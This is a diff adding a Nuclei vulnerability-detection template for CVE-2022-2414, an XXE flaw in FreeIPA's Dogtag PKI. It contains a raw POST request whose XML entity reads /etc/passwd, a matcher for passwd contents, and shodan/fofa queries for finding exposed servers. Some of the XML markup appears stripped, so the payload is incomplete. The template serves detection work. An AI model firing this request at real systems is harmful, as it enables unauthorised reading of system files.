diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml new file mode 100644 index 0000000000..6fe2dd7f1e --- /dev/null +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-2414 + +info: + name: FreeIPA - XML Entity Injection + author: DhiyaneshDk + severity: high + description: | + Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-2414 + - https://github.com/dogtagpki/pki/pull/4021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-2414 + cwe-id: CWE-611 + metadata: + max-request: 1 + fofa-query: title="Identity Management" + shodan-query: title:"Identity Management" html:"FreeIPA" + verified: true + tags: cve,cve2022,dogtag,freeipa,xxe + +http: + - raw: + - | + POST /ca/rest/certrequests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + ]> + + + &ent; + + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: body + words: + - "PKIException" + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 400